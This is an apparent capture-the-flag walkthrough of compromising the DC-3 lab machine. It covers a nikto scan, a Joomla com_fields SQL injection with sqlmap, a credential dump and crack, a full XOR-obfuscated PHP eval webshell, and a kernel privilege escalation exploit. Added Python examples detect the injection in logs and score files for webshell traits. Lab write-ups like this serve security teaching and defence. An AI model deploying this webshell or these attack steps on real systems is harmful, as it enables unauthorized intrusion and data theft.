Contents
Preface
First of all, remember that any unauthorized penetration is illegal, so do not go hacking things at random or you will end up crying behind bars. You can build local practice targets instead, such as DVWA.
Project overview
Target: 172.16.10.31
Attacker machines: 172.16.10.13; 172.16.10.26
I. Information gathering
1. Host discovery
2. Port scanning
3. Service version scanning
II. Exploitation
1. Visiting the web site
The home page tells us that this machine has only one flag, and that getting it requires root privileges.
This time, there is only one flag, one entry point and no clues.
To get the flag, you'll obviously have to gain root privileges.
How you get to be root is up to you - and, obviously, the system.
Good luck - and I hope you enjoy this little challenge. :-)
2. Identifying the web framework
3. Nikto scan
Scan the site with nikto to see which vulnerabilities and files it reports
└─# nikto -h 172.16.10.31
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 172.16.10.31
+ Target Hostname: 172.16.10.31
+ Target Port: 80
+ Start Time: 2024-01-02 20:19:35 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: DEBUG HTTP verb may show server debugging information. See: https://docs.microsoft.com/en-us/visualstudio/debugger/how-to-enable-debugging-for-aspnet-applications?view=vs-2017
+ /index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc: EW FileManager for PostNuke allows arbitrary file retrieval. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2047
+ /administrator/: This might be interesting.
+ /bin/: This might be interesting.
+ /includes/: This might be interesting.
+ /tmp/: This might be interesting.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8910 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2024-01-02 20:19:55 (GMT8) (20 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Report results (the same scan saved as an HTML report with -Format html, rendered here as a table)

Target IP: 172.16.10.31
Target hostname: 172.16.10.31
Target port: 80
HTTP server: Apache/2.4.18 (Ubuntu)
Site link (name / IP): http://172.16.10.31:80/

The test link for each finding is http://172.16.10.31:80 followed by the URI.

URI | HTTP method | Description | References
/ | GET | The anti-clickjacking X-Frame-Options header is not present. | X-Frame-Options - HTTP (MDN)
/ | GET | The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. | Missing Content-Type Header Detected on Web Application (Invicti)
/images | GET | IP address found in the 'location' header. The IP is "127.0.1.1". | Private IP addresses disclosed (PortSwigger)
/images | GET | The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". | CVE-2000-0649
/ | HEAD | Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch. | -
/ | ULIJVHGE | Web Server returns a valid response with junk HTTP methods which may cause false positives. | -
/ | DEBUG | DEBUG HTTP verb may show server debugging information. | Enable debugging for ASP.NET apps - Visual Studio (Microsoft Learn)
/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc | GET | EW FileManager for PostNuke allows arbitrary file retrieval. | CVE-2004-2047
/administrator/ | GET | This might be interesting. | -
/bin/ | GET | This might be interesting. | -
/includes/ | GET | This might be interesting. | -
/tmp/ | GET | This might be interesting. | -
/LICENSE.txt | GET | License file found may identify site software. | -
/icons/README | GET | Apache default file found. | https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
/htaccess.txt | GET | Default Joomla! htaccess.txt file found. This should be removed or renamed. | -
/administrator/index.php | GET | Admin login page/section found. | -

Host summary
Start time: 2024-01-02 20:45:40
End time: 2024-01-02 20:46:00
Elapsed time: 20 seconds
Statistics: 8910 requests, 0 errors, 16 findings

Scan summary
Software details: Nikto 2.5.0
CLI options: -h 172.16.10.31 -Format html -o nikto_report.html
Hosts tested: 1
Start time: Tue Jan 2 20:45:40 2024
End time: Tue Jan 2 20:46:00 2024
Elapsed time: 20 seconds
The site is clearly running Joomla. Knowing the framework, we search for a vulnerability affecting this version: CVE-2017-8917
└─# searchsploit joomla | grep 3.7
Joomla! 1.5.x - 404 Error Page Cross-Site Scripting | php/webapps/33378.txt
Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit) | php/remote/38797.rb
Joomla! 3.7 - SQL Injection | php/remote/44227.php
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component actualite 1.0 - 'id' SQL Injection | php/webapps/5337.txt
Joomla! Component ARI Quiz 3.7.4 - SQL Injection | php/webapps/46769.txt
Joomla! Component CCNewsLetter 2.1.9 - 'sbid' SQL Injection | php/webapps/42387.txt
Joomla! Component Cmimarketplace - 'viewit' Directory Traversal | php/webapps/8367.txt
Joomla! Component com_alert - 'q_item' SQL Injection | php/webapps/33771.txt
Joomla! Component com_aml_2 - 'art' SQL Injection | php/webapps/33795.txt
Joomla! Component com_as - 'catid' SQL Injection | php/webapps/33766.txt
Joomla! Component com_cb - 'cat' SQL Injection | php/webapps/33796.txt
Joomla! Component com_cbcontact - 'contact_id' SQL Injection | php/webapps/35745.txt
Joomla! Component com_d-greinar - 'maintree' Cross-Site Scripting | php/webapps/33757.txt
Joomla! Component com_facegallery 1.0 - Multiple Vulnerabilities | php/webapps/34754.py
Joomla! Component com_informations - SQL Injection | php/webapps/37774.txt
Joomla! Component com_jem 2.1.4 - Multiple Vulnerabilities | multiple/webapps/37767.txt
Joomla! Component com_jphoto - 'id' SQL Injection | php/webapps/10367.txt
Joomla! Component com_jresearch - 'Controller' Local File Inclusion | php/webapps/33797.txt
Joomla! Component com_macgallery 1.5 - Arbitrary File Download | php/webapps/34755.py
Joomla! Component com_memorix - SQL Injection | php/webapps/37773.txt
Joomla! Component com_photoblog - Blind SQL Injection | php/webapps/11337.txt
Joomla! Component com_realestatemanager 3.7 - SQL Injection | php/webapps/38445.txt
Joomla! Component com_seek - 'id' SQL Injection | php/webapps/33756.txt
Joomla! Component com_shop - SQL Injection | php/webapps/35797.txt
Joomla! Component com_tax - 'eid' SQL Injection | php/webapps/34708.pl
Joomla! Component com_ybggal 1.0 - 'catid' SQL Injection | php/webapps/13979.txt
Joomla! Component DM Orders - 'id' SQL Injection | php/webapps/33474.txt
Joomla! Component EShop 2.5.1 - 'id' SQL Injection | php/webapps/41387.txt
Joomla! Component HD FLV Player - 'id' SQL Injection | php/webapps/33673.pl
Joomla! Component J2Store < 3.3.7 - SQL Injection | php/webapps/46467.txt
Joomla! Component JE auction 1.6 - 'eid' SQL Injection | php/webapps/41337.txt
Joomla! Component JE Messanger - SQL Injection | php/webapps/41347.txt
Joomla! Component jLike 1.0 - Information Leak | php/webapps/43977.php
Joomla! Component Job - SQL Injection | php/webapps/11307.txt
Joomla! Component Jobads - 'type' SQL Injection | php/webapps/33478.txt
Joomla! Component JomEstate PRO 3.7 - 'id' SQL Injection | php/webapps/44117.txt
Joomla! Component JoomRecipe 1.0.4 - 'search_author' SQL Injection | php/webapps/42347.txt
Joomla! Component JSP Tickets 1.1 - SQL Injection | php/webapps/43978.txt
Joomla! Component Jtag Members Directory 5.3.7 - Arbitrary File Download | php/webapps/43913.txt
Joomla! Component JVideoClip 1.5.1 - 'uid' SQL Injection | php/webapps/38777.txt
Joomla! Component Map Locator - 'cid' SQL Injection | php/webapps/35788.txt
Joomla! Component OrgChart 1.0.0 - Local File Inclusion | php/webapps/12317.txt
Joomla! Component ProofReader 1.0 RC9 - Cross-Site Scripting | php/webapps/33377.txt
Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection | php/webapps/42589.txt
Joomla! Component Rapid-Recipe - Persistent Cross-Site Scripting | php/webapps/14327.txt
Joomla! Component RSfiles 1.0.2 - 'path' File Download | php/webapps/4307.txt
Joomla! Component Soccer Bet 4.1.5 - 'cat' SQL Injection | php/webapps/41327.txt
Joomla! Component Sponsor Wall 1.1 - SQL Injection | php/webapps/15367.txt
Joomla! Component User Bench 1.0 - 'userid' SQL Injection | php/webapps/43357.txt
Joomla! Component Visites 1.1 - MosConfig_absolute_path Remote File Inclusion | php/webapps/31708.txt
Joomla! Component Zh BaiduMap 3.0.0.1 - SQL Injection | php/webapps/43974.txt
Joomla! Component Zh GoogleMap 8.4.0.0 - SQL Injection | php/webapps/43976.txt
Joomla! Component Zh YandexMap 6.2.1.0 - 'id' SQL Injection | php/webapps/43975.html
There is an SQL injection vulnerability; opening the exploit details shows that sqlmap can be used to perform the injection
Using Sqlmap:
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
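From the defender's side, the request above leaves a clear trace in the web server's access log. The following added example (not part of the original write-up) parses Apache combined-format log lines and flags requests to com_fields whose list[fullordering] parameter carries SQL functions such as updatexml or extractvalue; the log lines, client addresses and timestamps are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" access-log format: client, ident, user, [timestamp], "METHOD path PROTO", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# SQL fragments that never belong in a Joomla list-ordering value
SQL_HINTS = re.compile(r'(updatexml|extractvalue|\bunion\b|sleep\s*\(|benchmark\s*\()', re.I)


def is_com_fields_sqli(path):
    """True if the request targets com_fields and list[fullordering] carries SQL.

    parse_qs percent-decodes parameter names as well as values, so an encoded
    name such as list%5Bfullordering%5D is matched too.
    """
    qs = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if qs.get("option") != ["com_fields"] or qs.get("view") != ["fields"]:
        return False
    return any(SQL_HINTS.search(v) for v in qs.get("list[fullordering]", []))


def scan_log(lines):
    """Return (client ip, timestamp, status, request path) for each suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_com_fields_sqli(m.group("path")):
            hits.append((m.group("ip"), m.group("ts"), m.group("status"), m.group("path")))
    return hits


# Constructed sample log lines (assumed format and values, not taken from the target machine)
SAMPLE_LOG = [
    '172.16.10.13 - - [02/Jan/2024:21:09:45 +0800] "GET /index.php?option=com_fields&view=fields'
    '&layout=modal&list%5Bfullordering%5D=updatexml HTTP/1.1" 500 2456 "-" "Mozilla/5.0"',
    '172.16.10.26 - - [02/Jan/2024:21:10:01 +0800] "GET /index.php?option=com_fields&view=fields'
    '&layout=modal&list%5Bfullordering%5D=a.ordering+ASC HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '172.16.10.13 - - [02/Jan/2024:21:10:07 +0800] "GET /index.php?option=com_fields&view=fields'
    '&list%5Bfullordering%5D=extractvalue HTTP/1.1" 500 2456 "-" "Mozilla/5.0"',
    '172.16.10.26 - - [02/Jan/2024:21:10:30 +0800] "GET /administrator/index.php HTTP/1.1" 200 4011 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, ts, status, path in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} {status} {path}")
```

The benign ordering value a.ordering ASC is what the component normally sends, so it is not flagged; a sudden run of 500 responses on this URL from one client is the other signal worth alerting on.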
4. Dumping the database
[21:09:45] [INFO] fetching database names
[21:09:45] [INFO] retrieved: 'information_schema'
[21:09:45] [INFO] retrieved: 'joomladb'
[21:09:45] [INFO] retrieved: 'mysql'
[21:09:45] [INFO] retrieved: 'performance_schema'
[21:09:45] [INFO] retrieved: 'sys'
available databases [5]:
[*] information_schema
[*] joomladb
[*] mysql
[*] performance_schema
[*] sys
5. Enumerating all tables in the joomladb database
Database: joomladb
[76 tables]
+---------------------+
| #__assets |
| #__associations |
| #__banner_clients |
| #__banner_tracks |
| #__banners |
| #__bsms_admin |
| #__bsms_books |
| #__bsms_comments |
| #__bsms_locations |
| #__bsms_mediafiles |
| #__bsms_message_typ |
| #__bsms_podcast |
| #__bsms_series |
| #__bsms_servers |
| #__bsms_studies |
| #__bsms_studytopics |
| #__bsms_teachers |
| #__bsms_templatecod |
| #__bsms_templates |
| #__bsms_timeset |
| #__bsms_topics |
| #__bsms_update |
| #__categories |
| #__contact_details |
| #__content_frontpag |
| #__content_rating |
| #__content_types |
| #__content |
| #__contentitem_tag_ |
| #__core_log_searche |
| #__extensions |
| #__fields_categorie |
| #__fields_groups |
| #__fields_values |
| #__fields |
| #__finder_filters |
| #__finder_links_ter |
| #__finder_links |
| #__finder_taxonomy_ |
| #__finder_taxonomy |
| #__finder_terms_com |
| #__finder_terms |
| #__finder_tokens_ag |
| #__finder_tokens |
| #__finder_types |
| #__jbsbackup_timese |
| #__jbspodcast_times |
| #__languages |
| #__menu_types |
| #__menu |
| #__messages_cfg |
| #__messages |
| #__modules_menu |
| #__modules |
| #__newsfeeds |
| #__overrider |
| #__postinstall_mess |
| #__redirect_links |
| #__schemas |
| #__session |
| #__tags |
| #__template_styles |
| #__ucm_base |
| #__ucm_content |
| #__ucm_history |
| #__update_sites_ext |
| #__update_sites |
| #__updates |
| #__user_keys |
| #__user_notes |
| #__user_profiles |
| #__user_usergroup_m |
| #__usergroups |
| #__users |
| #__utf8_conversion |
| #__viewlevels |
+---------------------+
6. Enumerating all columns of the #__users table
Database: joomladb
Table: #__users
[6 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| name | non-numeric |
| email | non-numeric |
| id | numeric |
| params | non-numeric |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
Read the contents of the username and password columns
Database: joomladb
Table: #__users
[1 entry]
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu |
+----------+--------------------------------------------------------------+
The password we obtained is a bcrypt hash (the $2y$ prefix), so it has to be cracked rather than decrypted.
Cracking it gives the password: snoopy
7. Logging in to the administrator backend
Log in to the backend with the user and password we obtained; the screen below shows a successful login
8. Getshell
Upload a webshell. A one-line webshell would do here; in a hardened environment an encrypted webshell is advisable. Instead of uploading a file, we create the webshell file directly:
<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b";
    $bs="base64_"."decode";
    $after=$bs($data."");
    for($i=0;$i<strlen($after);$i++) {
        $after[$i] = $after[$i]^$key[$i+1&15];
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
eval($post);
?>
Connect to the webshell
III. Privilege escalation
First get a reverse shell into msf; use whichever method you prefer (a bash reverse shell would also work), but to make escalation easier we use msf here
A successful callback looks like the figure below
Start escalating privileges
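From the defender's side, the webshell above has several static tells: eval of the raw POST body read from php://input, a function name assembled from string pieces, an XOR loop over a fixed key, and suppressed error reporting. The following added example (not part of the original write-up) scores PHP source on those indicators and can walk a web root; the indicator weights and threshold are assumptions, and the samples are constructed, the first one being the shell shown above.

```python
import os
import re

# Static indicators and assumed weights; rarer-in-legitimate-code patterns weigh more.
INDICATORS = {
    "eval_call":       (re.compile(r'\beval\s*\(', re.I), 3),
    "raw_post_body":   (re.compile(r'php://input', re.I), 3),
    "split_func_name": (re.compile(r'"(base64_|str_rot|gz)"\s*\.\s*"', re.I), 2),  # "base64_"."decode"
    "xor_loop":        (re.compile(r'\[\s*\$\w+\s*\]\s*\^\s*\$\w+\s*\['), 2),        # $after[$i]^$key[...]
    "silenced_errors": (re.compile(r'@\s*error_reporting\s*\(\s*0\s*\)', re.I), 1),
    "dynamic_call":    (re.compile(r'\$\w+\s*\(\s*\$\w+'), 1),                        # $bs($data)
}

def score_php(source):
    """Return (total score, names of the indicators that matched)."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(source)]
    return sum(INDICATORS[h][1] for h in hits), hits

def classify(source, threshold=5):
    """Label PHP source text; the threshold needs more than one weak indicator to trip."""
    score, hits = score_php(source)
    return ("webshell" if score >= threshold else "clean"), score, hits

def scan_directory(root, threshold=5):
    """Walk a web root and return (path, score, hits) for each .php file over the threshold."""
    flagged = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="ignore") as f:
                    label, score, hits = classify(f.read(), threshold)
                if label == "webshell":
                    flagged.append((path, score, hits))
    return flagged

# Constructed samples: the shell from this write-up, and ordinary template code for comparison.
SHELL_SAMPLE = r'''<?php
@error_reporting(0);
function Decrypt($data) {
    $key="e45e329feb5d925b"; $bs="base64_"."decode"; $after=$bs($data."");
    for($i=0;$i<strlen($after);$i++) { $after[$i] = $after[$i]^$key[$i+1&15]; }
    return $after;
}
$post=Decrypt(file_get_contents("php://input")); eval($post);
?>'''
BENIGN_SAMPLE = r'''<?php
$data = json_decode(file_get_contents(__DIR__ . "/data.json"), true);
echo htmlspecialchars($data["title"]);
?>'''
```

On a Joomla install, running scan_directory over the templates directory (where this shell was dropped, as the www-data prompt later shows) and comparing against a known-good copy narrows the review to files the CMS itself never ships.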
meterpreter > shell
Process 1752 created.
Channel 0 created.
python -c "import pty;pty.spawn('/bin/bash')"
www-data@DC-3:/var/www/html/templates/beez3$
www-data@DC-3:/var/www/html/templates/beez3$ whoami
whoami
www-data
www-data@DC-3:/var/www/html/templates/beez3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
We are still running as www-data, so we need a way to obtain root; two methods work here.
Method 1
Get the operating system version information
Get the operating system distribution information
The system is Ubuntu 16.04, so we look for a matching exploit with searchsploit
Filter out irrelevant entries using the information gathered above
If you are unsure which one to use, try them one by one; the exploit below successfully escalates to root
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation | linux/local/39772.txt
1. Download the exploit
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
2. Upload the exploit
Transfer the downloaded exploit to the target. Here we simply start a web server on the attacker machine and use wget on the target to fetch the file from it.
Unzip 39772.zip, then unpack the exploit archive inside it; once extracted, run the following commands
www-data@host:~/ebpf_mapfd_doubleput$ ./compile.sh
www-data@host:~/ebpf_mapfd_doubleput$ ./doubleput
Running id afterwards shows that we are now root
Enter the root directory and find the flag
IV. Persistence
Skipped
V. Clearing tracks
Skipped
Summary
Overall, a penetration test consists of a series of steps: information gathering, vulnerability discovery and exploitation, access-control testing, and backdoor access. Finally, remediation advice is given for the vulnerabilities found and the testing process is summarised, providing guidance for improving the system's security.